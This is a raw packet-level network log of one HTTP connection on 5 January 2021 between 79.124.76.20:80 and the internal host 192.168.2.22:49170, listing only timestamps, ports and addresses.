Jan 5, 2021 10:06:48.507589102 CET	80	49170	79.124.76.20	192.168.2.22
Jan 5, 2021 10:06:48.507750988 CET	80	49170	79.124.76.20	192.168.2.22
Jan 5, 2021 10:06:48.507776022 CET	80	49170	79.124.76.20	192.168.2.22
Jan 5, 2021 10:06:48.507834911 CET	80	49170	79.124.76.20	192.168.2.22
Jan 5, 2021 10:06:48.507953882 CET	80	49170	79.124.76.20	192.168.2.22
Jan 5, 2021 10:06:48.508066893 CET	80	49170	79.124.76.20	192.168.2.22
Jan 5, 2021 10:06:48.508197069 CET	80	49170	79.124.76.20	192.168.2.22
Jan 5, 2021 10:06:48.508312941 CET	80	49170	79.124.76.20	192.168.2.22
Jan 5, 2021 10:06:48.508430958 CET	80	49170	79.124.76.20	192.168.2.22
Jan 5, 2021 10:06:48.508508921 CET	80	49170	79.124.76.20	192.168.2.22
Jan 5, 2021 10:06:48.508761883 CET	80	49170	79.124.76.20	192.168.2.22
Jan 5, 2021 10:06:48.508796930 CET	80	49170	79.124.76.20	192.168.2.22
Jan 5, 2021 10:06:48.509002924 CET	80	49170	79.124.76.20	192.168.2.22
Jan 5, 2021 10:06:48.509027958 CET	80	49170	79.124.76.20	192.168.2.22
Jan 5, 2021 10:06:48.509152889 CET	49170	80	192.168.2.22	79.124.76.20
Jan 5, 2021 10:06:48.509164095 CET	49170	80	192.168.2.22	79.124.76.20
Jan 5, 2021 10:06:48.509224892 CET	80	49170	79.124.76.20	192.168.2.22
Jan 5, 2021 10:06:48.509260893 CET	80	49170	79.124.76.20	192.168.2.22
Jan 5, 2021 10:06:48.509418011 CET	49170	80	192.168.2.22	79.124.76.20
Jan 5, 2021 10:06:48.509460926 CET	80	49170	79.124.76.20	192.168.2.22
Jan 5, 2021 10:06:48.509485960 CET	80	49170	79.124.76.20	192.168.2.22
Jan 5, 2021 10:06:48.509567022 CET	49170	80	192.168.2.22	79.124.76.20
Jan 5, 2021 10:06:48.509679079 CET	80	49170	79.124.76.20	192.168.2.22
Jan 5, 2021 10:06:48.509701967 CET	80	49170	79.124.76.20	192.168.2.22
Jan 5, 2021 10:06:48.509736061 CET	49170	80	192.168.2.22	79.124.76.20
Jan 5, 2021 10:06:48.509919882 CET	80	49170	79.124.76.20	192.168.2.22
Jan 5, 2021 10:06:48.509943008 CET	80	49170	79.124.76.20	192.168.2.22
Jan 5, 2021 10:06:48.509996891 CET	49170	80	192.168.2.22	79.124.76.20
Jan 5, 2021 10:06:48.510128021 CET	80	49170	79.124.76.20	192.168.2.22
Jan 5, 2021 10:06:48.510150909 CET	80	49170	79.124.76.20	192.168.2.22
Jan 5, 2021 10:06:48.510289907 CET	49170	80	192.168.2.22	79.124.76.20
Jan 5, 2021 10:06:48.510370016 CET	80	49170	79.124.76.20	192.168.2.22
Jan 5, 2021 10:06:48.510392904 CET	80	49170	79.124.76.20	192.168.2.22
Jan 5, 2021 10:06:48.510438919 CET	49170	80	192.168.2.22	79.124.76.20
Jan 5, 2021 10:06:48.510554075 CET	80	49170	79.124.76.20	192.168.2.22
Jan 5, 2021 10:06:48.510632992 CET	80	49170	79.124.76.20	192.168.2.22
Jan 5, 2021 10:06:48.510708094 CET	49170	80	192.168.2.22	79.124.76.20
Jan 5, 2021 10:06:48.510797024 CET	80	49170	79.124.76.20	192.168.2.22
Jan 5, 2021 10:06:48.510855913 CET	80	49170	79.124.76.20	192.168.2.22
Jan 5, 2021 10:06:48.511001110 CET	49170	80	192.168.2.22	79.124.76.20
Jan 5, 2021 10:06:48.511049032 CET	80	49170	79.124.76.20	192.168.2.22
Jan 5, 2021 10:06:48.511076927 CET	80	49170	79.124.76.20	192.168.2.22
Jan 5, 2021 10:06:48.511137009 CET	49170	80	192.168.2.22	79.124.76.20
Jan 5, 2021 10:06:48.511257887 CET	80	49170	79.124.76.20	192.168.2.22
Jan 5, 2021 10:06:48.511316061 CET	80	49170	79.124.76.20	192.168.2.22
Jan 5, 2021 10:06:48.511393070 CET	49170	80	192.168.2.22	79.124.76.20
Jan 5, 2021 10:06:48.511518955 CET	80	49170	79.124.76.20	192.168.2.22
Jan 5, 2021 10:06:48.511543036 CET	80	49170	79.124.76.20	192.168.2.22
Jan 5, 2021 10:06:48.511619091 CET	49170	80	192.168.2.22	79.124.76.20
Jan 5, 2021 10:06:48.511692047 CET	80	49170	79.124.76.20	192.168.2.22
Jan 5, 2021 10:06:48.511773109 CET	80	49170	79.124.76.20	192.168.2.22
Jan 5, 2021 10:06:48.511863947 CET	49170	80	192.168.2.22	79.124.76.20
Jan 5, 2021 10:06:48.511944056 CET	80	49170	79.124.76.20	192.168.2.22
Jan 5, 2021 10:06:48.511966944 CET	80	49170	79.124.76.20	192.168.2.22
Jan 5, 2021 10:06:48.512006998 CET	49170	80	192.168.2.22	79.124.76.20
Jan 5, 2021 10:06:48.512167931 CET	80	49170	79.124.76.20	192.168.2.22
Jan 5, 2021 10:06:48.512203932 CET	80	49170	79.124.76.20	192.168.2.22
Jan 5, 2021 10:06:48.512267113 CET	49170	80	192.168.2.22	79.124.76.20
Jan 5, 2021 10:06:48.512409925 CET	80	49170	79.124.76.20	192.168.2.22
Jan 5, 2021 10:06:48.512439966 CET	80	49170	79.124.76.20	192.168.2.22
Jan 5, 2021 10:06:48.512484074 CET	49170	80	192.168.2.22	79.124.76.20
Jan 5, 2021 10:06:48.512595892 CET	80	49170	79.124.76.20	192.168.2.22
Jan 5, 2021 10:06:48.512684107 CET	80	49170	79.124.76.20	192.168.2.22
Jan 5, 2021 10:06:48.512820005 CET	49170	80	192.168.2.22	79.124.76.20
Jan 5, 2021 10:06:48.512876034 CET	80	49170	79.124.76.20	192.168.2.22
Jan 5, 2021 10:06:48.534806967 CET	80	49170	79.124.76.20	192.168.2.22
Jan 5, 2021 10:06:48.534853935 CET	80	49170	79.124.76.20	192.168.2.22
Jan 5, 2021 10:06:48.534878016 CET	49170	80	192.168.2.22	79.124.76.20
Jan 5, 2021 10:06:48.534912109 CET	80	49170	79.124.76.20	192.168.2.22
Jan 5, 2021 10:06:48.535053015 CET	80	49170	79.124.76.20	192.168.2.22
Jan 5, 2021 10:06:48.535063028 CET	49170	80	192.168.2.22	79.124.76.20
Jan 5, 2021 10:06:48.535165071 CET	80	49170	79.124.76.20	192.168.2.22
Jan 5, 2021 10:06:48.535281897 CET	80	49170	79.124.76.20	192.168.2.22
Jan 5, 2021 10:06:48.535768986 CET	49170	80	192.168.2.22	79.124.76.20
Jan 5, 2021 10:06:48.610008001 CET	80	49170	79.124.76.20	192.168.2.22
Jan 5, 2021 10:06:48.610052109 CET	80	49170	79.124.76.20	192.168.2.22
Jan 5, 2021 10:06:48.610076904 CET	49170	80	192.168.2.22	79.124.76.20
Jan 5, 2021 10:06:48.610275984 CET	80	49170	79.124.76.20	192.168.2.22
Jan 5, 2021 10:06:48.610300064 CET	80	49170	79.124.76.20	192.168.2.22
Jan 5, 2021 10:06:48.610342979 CET	49170	80	192.168.2.22	79.124.76.20
Jan 5, 2021 10:06:48.627315044 CET	80	49170	79.124.76.20	192.168.2.22
Jan 5, 2021 10:06:48.627407074 CET	49170	80	192.168.2.22	79.124.76.20
Jan 5, 2021 10:06:48.627453089 CET	80	49170	79.124.76.20	192.168.2.22
Jan 5, 2021 10:06:48.627481937 CET	80	49170	79.124.76.20	192.168.2.22
Jan 5, 2021 10:06:48.627528906 CET	49170	80	192.168.2.22	79.124.76.20
Jan 5, 2021 10:06:48.627685070 CET	80	49170	79.124.76.20	192.168.2.22
Jan 5, 2021 10:06:48.627716064 CET	80	49170	79.124.76.20	192.168.2.22
Jan 5, 2021 10:06:48.627845049 CET	49170	80	192.168.2.22	79.124.76.20
Jan 5, 2021 10:06:48.627922058 CET	80	49170	79.124.76.20	192.168.2.22
Jan 5, 2021 10:06:48.627948046 CET	80	49170	79.124.76.20	192.168.2.22
Jan 5, 2021 10:06:48.628000975 CET	49170	80	192.168.2.22	79.124.76.20
Jan 5, 2021 10:06:48.628009081 CET	80	49170	79.124.76.20	192.168.2.22
Jan 5, 2021 10:06:48.628070116 CET	80	49170	79.124.76.20	192.168.2.22
Jan 5, 2021 10:06:48.628118038 CET	80	49170	79.124.76.20	192.168.2.22
Jan 5, 2021 10:06:48.628384113 CET	80	49170	79.124.76.20	192.168.2.22
Jan 5, 2021 10:06:48.628412962 CET	80	49170	79.124.76.20	192.168.2.22
Jan 5, 2021 10:06:48.628608942 CET	80	49170	79.124.76.20	192.168.2.22
Jan 5, 2021 10:06:48.628632069 CET	80	49170	79.124.76.20	192.168.2.22
Jan 5, 2021 10:06:48.628839970 CET	80	49170	79.124.76.20	192.168.2.22
Jan 5, 2021 10:06:48.628865957 CET	80	49170	79.124.76.20	192.168.2.22
Jan 5, 2021 10:06:48.629203081 CET	49170	80	192.168.2.22	79.124.76.20
Jan 5, 2021 10:06:48.629220963 CET	49170	80	192.168.2.22	79.124.76.20
Jan 5, 2021 10:06:48.634263039 CET	80	49170	79.124.76.20	192.168.2.22
Jan 5, 2021 10:06:48.634320974 CET	80	49170	79.124.76.20	192.168.2.22
Jan 5, 2021 10:06:48.634428024 CET	80	49170	79.124.76.20	192.168.2.22
Jan 5, 2021 10:06:48.634516001 CET	80	49170	79.124.76.20	192.168.2.22
Jan 5, 2021 10:06:48.634574890 CET	49170	80	192.168.2.22	79.124.76.20
Jan 5, 2021 10:06:48.634602070 CET	49170	80	192.168.2.22	79.124.76.20
Jan 5, 2021 10:06:48.634653091 CET	80	49170	79.124.76.20	192.168.2.22
Jan 5, 2021 10:06:48.634757996 CET	80	49170	79.124.76.20	192.168.2.22
Jan 5, 2021 10:06:48.634893894 CET	49170	80	192.168.2.22	79.124.76.20
Jan 5, 2021 10:06:48.634896040 CET	80	49170	79.124.76.20	192.168.2.22
Jan 5, 2021 10:06:48.635020018 CET	80	49170	79.124.76.20	192.168.2.22
Jan 5, 2021 10:06:48.635076046 CET	80	49170	79.124.76.20	192.168.2.22
Jan 5, 2021 10:06:48.635200977 CET	80	49170	79.124.76.20	192.168.2.22
Jan 5, 2021 10:06:48.635235071 CET	49170	80	192.168.2.22	79.124.76.20
Jan 5, 2021 10:06:48.635258913 CET	49170	80	192.168.2.22	79.124.76.20
Jan 5, 2021 10:06:48.635318995 CET	80	49170	79.124.76.20	192.168.2.22
Jan 5, 2021 10:06:48.635438919 CET	80	49170	79.124.76.20	192.168.2.22
Jan 5, 2021 10:06:48.635490894 CET	49170	80	192.168.2.22	79.124.76.20
Jan 5, 2021 10:06:48.635561943 CET	80	49170	79.124.76.20	192.168.2.22
Jan 5, 2021 10:06:48.635740995 CET	80	49170	79.124.76.20	192.168.2.22
Jan 5, 2021 10:06:48.635766029 CET	80	49170	79.124.76.20	192.168.2.22
Jan 5, 2021 10:06:48.635881901 CET	80	49170	79.124.76.20	192.168.2.22
Jan 5, 2021 10:06:48.636001110 CET	80	49170	79.124.76.20	192.168.2.22
Jan 5, 2021 10:06:48.636054039 CET	49170	80	192.168.2.22	79.124.76.20
Jan 5, 2021 10:06:48.636075020 CET	49170	80	192.168.2.22	79.124.76.20
Jan 5, 2021 10:06:48.636111975 CET	80	49170	79.124.76.20	192.168.2.22
Jan 5, 2021 10:06:48.636235952 CET	80	49170	79.124.76.20	192.168.2.22
Jan 5, 2021 10:06:48.636351109 CET	80	49170	79.124.76.20	192.168.2.22
Jan 5, 2021 10:06:48.636396885 CET	49170	80	192.168.2.22	79.124.76.20
Jan 5, 2021 10:06:48.636441946 CET	80	49170	79.124.76.20	192.168.2.22
Jan 5, 2021 10:06:48.636544943 CET	80	49170	79.124.76.20	192.168.2.22
Jan 5, 2021 10:06:48.636643887 CET	49170	80	192.168.2.22	79.124.76.20
Jan 5, 2021 10:06:48.636724949 CET	80	49170	79.124.76.20	192.168.2.22
Jan 5, 2021 10:06:48.636929989 CET	80	49170	79.124.76.20	192.168.2.22
Jan 5, 2021 10:06:48.636951923 CET	80	49170	79.124.76.20	192.168.2.22
Jan 5, 2021 10:06:48.637094021 CET	49170	80	192.168.2.22	79.124.76.20
Jan 5, 2021 10:06:48.637151957 CET	80	49170	79.124.76.20	192.168.2.22
Jan 5, 2021 10:06:48.637202978 CET	49170	80	192.168.2.22	79.124.76.20
Jan 5, 2021 10:06:48.637418985 CET	80	49170	79.124.76.20	192.168.2.22
Jan 5, 2021 10:06:48.637440920 CET	80	49170	79.124.76.20	192.168.2.22
Jan 5, 2021 10:06:48.637473106 CET	80	49170	79.124.76.20	192.168.2.22
Jan 5, 2021 10:06:48.637501955 CET	49170	80	192.168.2.22	79.124.76.20
Jan 5, 2021 10:06:48.637634993 CET	80	49170	79.124.76.20	192.168.2.22
Jan 5, 2021 10:06:48.637660027 CET	80	49170	79.124.76.20	192.168.2.22
Jan 5, 2021 10:06:48.637692928 CET	49170	80	192.168.2.22	79.124.76.20
Jan 5, 2021 10:06:48.637799978 CET	80	49170	79.124.76.20	192.168.2.22
Jan 5, 2021 10:06:48.637834072 CET	80	49170	79.124.76.20	192.168.2.22
Jan 5, 2021 10:06:48.637923002 CET	49170	80	192.168.2.22	79.124.76.20
Jan 5, 2021 10:06:48.638041973 CET	80	49170	79.124.76.20	192.168.2.22
Jan 5, 2021 10:06:48.638066053 CET	80	49170	79.124.76.20	192.168.2.22
Jan 5, 2021 10:06:48.638123035 CET	49170	80	192.168.2.22	79.124.76.20
Jan 5, 2021 10:06:48.638290882 CET	80	49170	79.124.76.20	192.168.2.22
Jan 5, 2021 10:06:48.638314962 CET	80	49170	79.124.76.20	192.168.2.22
Jan 5, 2021 10:06:48.638444901 CET	49170	80	192.168.2.22	79.124.76.20
Jan 5, 2021 10:06:48.638521910 CET	80	49170	79.124.76.20	192.168.2.22
Jan 5, 2021 10:06:48.638546944 CET	80	49170	79.124.76.20	192.168.2.22
Jan 5, 2021 10:06:48.638597965 CET	49170	80	192.168.2.22	79.124.76.20
Jan 5, 2021 10:06:48.638720989 CET	80	49170	79.124.76.20	192.168.2.22
Jan 5, 2021 10:06:48.638755083 CET	80	49170	79.124.76.20	192.168.2.22
Jan 5, 2021 10:06:48.638828039 CET	49170	80	192.168.2.22	79.124.76.20
Jan 5, 2021 10:06:48.638936043 CET	80	49170	79.124.76.20	192.168.2.22
Jan 5, 2021 10:06:48.638963938 CET	80	49170	79.124.76.20	192.168.2.22
Jan 5, 2021 10:06:48.639039993 CET	80	49170	79.124.76.20	192.168.2.22
Jan 5, 2021 10:06:48.639070034 CET	49170	80	192.168.2.22	79.124.76.20
Jan 5, 2021 10:06:48.639144897 CET	80	49170	79.124.76.20	192.168.2.22
Jan 5, 2021 10:06:48.639409065 CET	80	49170	79.124.76.20	192.168.2.22
Jan 5, 2021 10:06:48.639431000 CET	80	49170	79.124.76.20	192.168.2.22
Jan 5, 2021 10:06:48.639457941 CET	49170	80	192.168.2.22	79.124.76.20
Jan 5, 2021 10:06:48.639635086 CET	80	49170	79.124.76.20	192.168.2.22
Jan 5, 2021 10:06:48.639657974 CET	80	49170	79.124.76.20	192.168.2.22
Jan 5, 2021 10:06:48.639874935 CET	80	49170	79.124.76.20	192.168.2.22
Jan 5, 2021 10:06:48.639898062 CET	80	49170	79.124.76.20	192.168.2.22
Jan 5, 2021 10:06:48.640105009 CET	80	49170	79.124.76.20	192.168.2.22
Jan 5, 2021 10:06:48.640129089 CET	80	49170	79.124.76.20	192.168.2.22
Jan 5, 2021 10:06:48.640324116 CET	80	49170	79.124.76.20	192.168.2.22
Jan 5, 2021 10:06:48.640475035 CET	80	49170	79.124.76.20	192.168.2.22
Jan 5, 2021 10:06:48.640501976 CET	80	49170	79.124.76.20	192.168.2.22
Jan 5, 2021 10:06:48.640562057 CET	80	49170	79.124.76.20	192.168.2.22
Jan 5, 2021 10:06:48.640678883 CET	80	49170	79.124.76.20	192.168.2.22
Jan 5, 2021 10:06:48.640753984 CET	80	49170	79.124.76.20	192.168.2.22
Jan 5, 2021 10:06:48.640845060 CET	80	49170	79.124.76.20	192.168.2.22
Jan 5, 2021 10:06:48.640970945 CET	80	49170	79.124.76.20	192.168.2.22
Jan 5, 2021 10:06:48.641117096 CET	80	49170	79.124.76.20	192.168.2.22
Jan 5, 2021 10:06:48.641182899 CET	80	49170	79.124.76.20	192.168.2.22
Jan 5, 2021 10:06:48.641304016 CET	80	49170	79.124.76.20	192.168.2.22
Jan 5, 2021 10:06:48.641438961 CET	80	49170	79.124.76.20	192.168.2.22
Jan 5, 2021 10:06:48.641558886 CET	80	49170	79.124.76.20	192.168.2.22
Jan 5, 2021 10:06:48.641678095 CET	80	49170	79.124.76.20	192.168.2.22
Jan 5, 2021 10:06:48.641757965 CET	80	49170	79.124.76.20	192.168.2.22
Jan 5, 2021 10:06:48.641880035 CET	80	49170	79.124.76.20	192.168.2.22
Jan 5, 2021 10:06:48.641995907 CET	80	49170	79.124.76.20	192.168.2.22
Jan 5, 2021 10:06:48.642117977 CET	80	49170	79.124.76.20	192.168.2.22
Jan 5, 2021 10:06:48.642124891 CET	49170	80	192.168.2.22	79.124.76.20
Jan 5, 2021 10:06:48.642148018 CET	49170	80	192.168.2.22	79.124.76.20
Jan 5, 2021 10:06:48.642206907 CET	80	49170	79.124.76.20	192.168.2.22
Jan 5, 2021 10:06:48.642211914 CET	49170	80	192.168.2.22	79.124.76.20
Jan 5, 2021 10:06:48.642256021 CET	49170	80	192.168.2.22	79.124.76.20
Jan 5, 2021 10:06:48.642338991 CET	80	49170	79.124.76.20	192.168.2.22
Jan 5, 2021 10:06:48.642478943 CET	80	49170	79.124.76.20	192.168.2.22
Jan 5, 2021 10:06:48.642549992 CET	80	49170	79.124.76.20	192.168.2.22
Jan 5, 2021 10:06:48.642632961 CET	49170	80	192.168.2.22	79.124.76.20
Jan 5, 2021 10:06:48.642657042 CET	80	49170	79.124.76.20	192.168.2.22
Jan 5, 2021 10:06:48.642766953 CET	49170	80	192.168.2.22	79.124.76.20
Jan 5, 2021 10:06:48.642805099 CET	80	49170	79.124.76.20	192.168.2.22
Jan 5, 2021 10:06:48.642923117 CET	80	49170	79.124.76.20	192.168.2.22
Jan 5, 2021 10:06:48.643012047 CET	80	49170	79.124.76.20	192.168.2.22
Jan 5, 2021 10:06:48.643027067 CET	49170	80	192.168.2.22	79.124.76.20
Jan 5, 2021 10:06:48.643134117 CET	80	49170	79.124.76.20	192.168.2.22
Jan 5, 2021 10:06:48.643198967 CET	49170	80	192.168.2.22	79.124.76.20
Jan 5, 2021 10:06:48.643277884 CET	80	49170	79.124.76.20	192.168.2.22
Jan 5, 2021 10:06:48.643400908 CET	80	49170	79.124.76.20	192.168.2.22
Jan 5, 2021 10:06:48.643452883 CET	49170	80	192.168.2.22	79.124.76.20
Jan 5, 2021 10:06:48.643476963 CET	80	49170	79.124.76.20	192.168.2.22
Jan 5, 2021 10:06:48.643573999 CET	80	49170	79.124.76.20	192.168.2.22
Jan 5, 2021 10:06:48.643683910 CET	80	49170	79.124.76.20	192.168.2.22
Jan 5, 2021 10:06:48.643708944 CET	49170	80	192.168.2.22	79.124.76.20
Jan 5, 2021 10:06:48.643938065 CET	80	49170	79.124.76.20	192.168.2.22
Jan 5, 2021 10:06:48.643965006 CET	80	49170	79.124.76.20	192.168.2.22
Jan 5, 2021 10:06:48.643990993 CET	49170	80	192.168.2.22	79.124.76.20
Jan 5, 2021 10:06:48.644155979 CET	80	49170	79.124.76.20	192.168.2.22
Jan 5, 2021 10:06:48.644180059 CET	80	49170	79.124.76.20	192.168.2.22
Jan 5, 2021 10:06:48.644242048 CET	49170	80	192.168.2.22	79.124.76.20
Jan 5, 2021 10:06:48.644407988 CET	80	49170	79.124.76.20	192.168.2.22
Jan 5, 2021 10:06:48.644440889 CET	80	49170	79.124.76.20	192.168.2.22
Jan 5, 2021 10:06:48.644632101 CET	80	49170	79.124.76.20	192.168.2.22
Jan 5, 2021 10:06:48.644654989 CET	80	49170	79.124.76.20	192.168.2.22
Jan 5, 2021 10:06:48.644856930 CET	80	49170	79.124.76.20	192.168.2.22
Jan 5, 2021 10:06:48.644881964 CET	80	49170	79.124.76.20	192.168.2.22
Jan 5, 2021 10:06:48.645092010 CET	80	49170	79.124.76.20	192.168.2.22
Jan 5, 2021 10:06:48.645117044 CET	80	49170	79.124.76.20	192.168.2.22
Jan 5, 2021 10:06:48.645309925 CET	80	49170	79.124.76.20	192.168.2.22
Jan 5, 2021 10:06:48.645333052 CET	80	49170	79.124.76.20	192.168.2.22
Jan 5, 2021 10:06:48.645539045 CET	80	49170	79.124.76.20	192.168.2.22
Jan 5, 2021 10:06:48.645565987 CET	80	49170	79.124.76.20	192.168.2.22
Jan 5, 2021 10:06:48.645616055 CET	49170	80	192.168.2.22	79.124.76.20
Jan 5, 2021 10:06:48.645790100 CET	80	49170	79.124.76.20	192.168.2.22
Jan 5, 2021 10:06:48.645813942 CET	80	49170	79.124.76.20	192.168.2.22
Jan 5, 2021 10:06:48.645979881 CET	80	49170	79.124.76.20	192.168.2.22
Jan 5, 2021 10:06:48.646042109 CET	80	49170	79.124.76.20	192.168.2.22
Jan 5, 2021 10:06:48.646217108 CET	80	49170	79.124.76.20	192.168.2.22
Jan 5, 2021 10:06:48.646239996 CET	80	49170	79.124.76.20	192.168.2.22
Jan 5, 2021 10:06:48.646291971 CET	49170	80	192.168.2.22	79.124.76.20
Jan 5, 2021 10:06:48.646315098 CET	49170	80	192.168.2.22	79.124.76.20
Jan 5, 2021 10:06:48.646450043 CET	80	49170	79.124.76.20	192.168.2.22
Jan 5, 2021 10:06:48.646477938 CET	80	49170	79.124.76.20	192.168.2.22
Jan 5, 2021 10:06:48.646636963 CET	80	49170	79.124.76.20	192.168.2.22
Jan 5, 2021 10:06:48.646668911 CET	80	49170	79.124.76.20	192.168.2.22
Jan 5, 2021 10:06:48.646891117 CET	80	49170	79.124.76.20	192.168.2.22
Jan 5, 2021 10:06:48.646915913 CET	80	49170	79.124.76.20	192.168.2.22
Jan 5, 2021 10:06:48.647090912 CET	80	49170	79.124.76.20	192.168.2.22
Jan 5, 2021 10:06:48.647119999 CET	80	49170	79.124.76.20	192.168.2.22
Jan 5, 2021 10:06:48.647147894 CET	49170	80	192.168.2.22	79.124.76.20
Jan 5, 2021 10:06:48.647320032 CET	80	49170	79.124.76.20	192.168.2.22
Jan 5, 2021 10:06:48.647350073 CET	80	49170	79.124.76.20	192.168.2.22
Jan 5, 2021 10:06:48.647543907 CET	80	49170	79.124.76.20	192.168.2.22
Jan 5, 2021 10:06:48.647567987 CET	80	49170	79.124.76.20	192.168.2.22
Jan 5, 2021 10:06:48.647790909 CET	80	49170	79.124.76.20	192.168.2.22
Jan 5, 2021 10:06:48.647814035 CET	80	49170	79.124.76.20	192.168.2.22
Jan 5, 2021 10:06:48.648027897 CET	80	49170	79.124.76.20	192.168.2.22
Jan 5, 2021 10:06:48.648051023 CET	80	49170	79.124.76.20	192.168.2.22
Jan 5, 2021 10:06:48.648230076 CET	80	49170	79.124.76.20	192.168.2.22
Jan 5, 2021 10:06:48.648252964 CET	80	49170	79.124.76.20	192.168.2.22
Jan 5, 2021 10:06:48.648282051 CET	49170	80	192.168.2.22	79.124.76.20
Jan 5, 2021 10:06:48.648299932 CET	49170	80	192.168.2.22	79.124.76.20
Jan 5, 2021 10:06:48.648360014 CET	49170	80	192.168.2.22	79.124.76.20
Jan 5, 2021 10:06:48.648467064 CET	80	49170	79.124.76.20	192.168.2.22
Jan 5, 2021 10:06:48.648489952 CET	80	49170	79.124.76.20	192.168.2.22
Jan 5, 2021 10:06:48.648540974 CET	49170	80	192.168.2.22	79.124.76.20
Jan 5, 2021 10:06:48.648699045 CET	80	49170	79.124.76.20	192.168.2.22
Jan 5, 2021 10:06:48.648726940 CET	80	49170	79.124.76.20	192.168.2.22
Jan 5, 2021 10:06:48.648773909 CET	49170	80	192.168.2.22	79.124.76.20
Jan 5, 2021 10:06:48.648931026 CET	80	49170	79.124.76.20	192.168.2.22
Jan 5, 2021 10:06:48.648963928 CET	80	49170	79.124.76.20	192.168.2.22
Jan 5, 2021 10:06:48.649051905 CET	49170	80	192.168.2.22	79.124.76.20
Jan 5, 2021 10:06:48.649156094 CET	80	49170	79.124.76.20	192.168.2.22
Jan 5, 2021 10:06:48.649179935 CET	80	49170	79.124.76.20	192.168.2.22
Jan 5, 2021 10:06:48.649240971 CET	49170	80	192.168.2.22	79.124.76.20
Jan 5, 2021 10:06:48.649369955 CET	80	49170	79.124.76.20	192.168.2.22
Jan 5, 2021 10:06:48.649431944 CET	80	49170	79.124.76.20	192.168.2.22
Jan 5, 2021 10:06:48.649564028 CET	49170	80	192.168.2.22	79.124.76.20
Jan 5, 2021 10:06:48.649625063 CET	80	49170	79.124.76.20	192.168.2.22
Jan 5, 2021 10:06:48.649656057 CET	80	49170	79.124.76.20	192.168.2.22
Jan 5, 2021 10:06:48.649710894 CET	49170	80	192.168.2.22	79.124.76.20
Jan 5, 2021 10:06:48.649830103 CET	80	49170	79.124.76.20	192.168.2.22
Jan 5, 2021 10:06:48.649853945 CET	80	49170	79.124.76.20	192.168.2.22
Jan 5, 2021 10:06:48.649921894 CET	49170	80	192.168.2.22	79.124.76.20
Jan 5, 2021 10:06:48.650089979 CET	80	49170	79.124.76.20	192.168.2.22
Jan 5, 2021 10:06:48.650125027 CET	80	49170	79.124.76.20	192.168.2.22
Jan 5, 2021 10:06:48.650181055 CET	49170	80	192.168.2.22	79.124.76.20
Jan 5, 2021 10:06:48.650284052 CET	80	49170	79.124.76.20	192.168.2.22
Jan 5, 2021 10:06:48.650317907 CET	80	49170	79.124.76.20	192.168.2.22
Jan 5, 2021 10:06:48.650379896 CET	49170	80	192.168.2.22	79.124.76.20
Jan 5, 2021 10:06:48.650538921 CET	80	49170	79.124.76.20	192.168.2.22
Jan 5, 2021 10:06:48.650562048 CET	80	49170	79.124.76.20	192.168.2.22
Jan 5, 2021 10:06:48.650621891 CET	49170	80	192.168.2.22	79.124.76.20
Jan 5, 2021 10:06:48.650719881 CET	80	49170	79.124.76.20	192.168.2.22
Jan 5, 2021 10:06:48.650749922 CET	80	49170	79.124.76.20	192.168.2.22
Jan 5, 2021 10:06:48.650808096 CET	49170	80	192.168.2.22	79.124.76.20
Jan 5, 2021 10:06:48.651001930 CET	80	49170	79.124.76.20	192.168.2.22
Jan 5, 2021 10:06:48.651022911 CET	80	49170	79.124.76.20	192.168.2.22
Jan 5, 2021 10:06:48.651070118 CET	49170	80	192.168.2.22	79.124.76.20
Jan 5, 2021 10:06:48.651187897 CET	80	49170	79.124.76.20	192.168.2.22
Jan 5, 2021 10:06:48.651207924 CET	80	49170	79.124.76.20	192.168.2.22
Jan 5, 2021 10:06:48.651298046 CET	49170	80	192.168.2.22	79.124.76.20
Jan 5, 2021 10:06:48.651434898 CET	80	49170	79.124.76.20	192.168.2.22
Jan 5, 2021 10:06:48.651479006 CET	80	49170	79.124.76.20	192.168.2.22
Jan 5, 2021 10:06:48.651505947 CET	80	49170	79.124.76.20	192.168.2.22
Jan 5, 2021 10:06:48.651623011 CET	49170	80	192.168.2.22	79.124.76.20
Jan 5, 2021 10:06:48.651629925 CET	80	49170	79.124.76.20	192.168.2.22
Jan 5, 2021 10:06:48.651675940 CET	49170	80	192.168.2.22	79.124.76.20
Jan 5, 2021 10:06:48.651766062 CET	80	49170	79.124.76.20	192.168.2.22
Jan 5, 2021 10:06:48.651845932 CET	80	49170	79.124.76.20	192.168.2.22
Jan 5, 2021 10:06:48.651958942 CET	80	49170	79.124.76.20	192.168.2.22
Jan 5, 2021 10:06:48.651983023 CET	49170	80	192.168.2.22	79.124.76.20
Jan 5, 2021 10:06:48.652129889 CET	80	49170	79.124.76.20	192.168.2.22
Jan 5, 2021 10:06:48.652185917 CET	80	49170	79.124.76.20	192.168.2.22
Jan 5, 2021 10:06:48.652324915 CET	80	49170	79.124.76.20	192.168.2.22
Jan 5, 2021 10:06:48.652400017 CET	80	49170	79.124.76.20	192.168.2.22
Jan 5, 2021 10:06:48.652523041 CET	80	49170	79.124.76.20	192.168.2.22
Jan 5, 2021 10:06:48.652640104 CET	80	49170	79.124.76.20	192.168.2.22
Jan 5, 2021 10:06:48.652762890 CET	80	49170	79.124.76.20	192.168.2.22
Jan 5, 2021 10:06:48.652889013 CET	80	49170	79.124.76.20	192.168.2.22
Jan 5, 2021 10:06:48.653003931 CET	80	49170	79.124.76.20	192.168.2.22
Jan 5, 2021 10:06:48.653124094 CET	80	49170	79.124.76.20	192.168.2.22
Jan 5, 2021 10:06:48.653203964 CET	80	49170	79.124.76.20	192.168.2.22
Jan 5, 2021 10:06:48.653332949 CET	80	49170	79.124.76.20	192.168.2.22
Jan 5, 2021 10:06:48.653423071 CET	80	49170	79.124.76.20	192.168.2.22
Jan 5, 2021 10:06:48.653579950 CET	80	49170	79.124.76.20	192.168.2.22
Jan 5, 2021 10:06:48.653683901 CET	80	49170	79.124.76.20	192.168.2.22
Jan 5, 2021 10:06:48.653768063 CET	80	49170	79.124.76.20	192.168.2.22
Jan 5, 2021 10:06:48.653883934 CET	80	49170	79.124.76.20	192.168.2.22
Jan 5, 2021 10:06:48.654016018 CET	80	49170	79.124.76.20	192.168.2.22
Jan 5, 2021 10:06:48.654273033 CET	80	49170	79.124.76.20	192.168.2.22
Jan 5, 2021 10:06:48.654300928 CET	80	49170	79.124.76.20	192.168.2.22
Jan 5, 2021 10:06:48.654449940 CET	80	49170	79.124.76.20	192.168.2.22
Jan 5, 2021 10:06:48.654480934 CET	80	49170	79.124.76.20	192.168.2.22
Jan 5, 2021 10:06:48.654597998 CET	49170	80	192.168.2.22	79.124.76.20
Jan 5, 2021 10:06:48.654608965 CET	49170	80	192.168.2.22	79.124.76.20
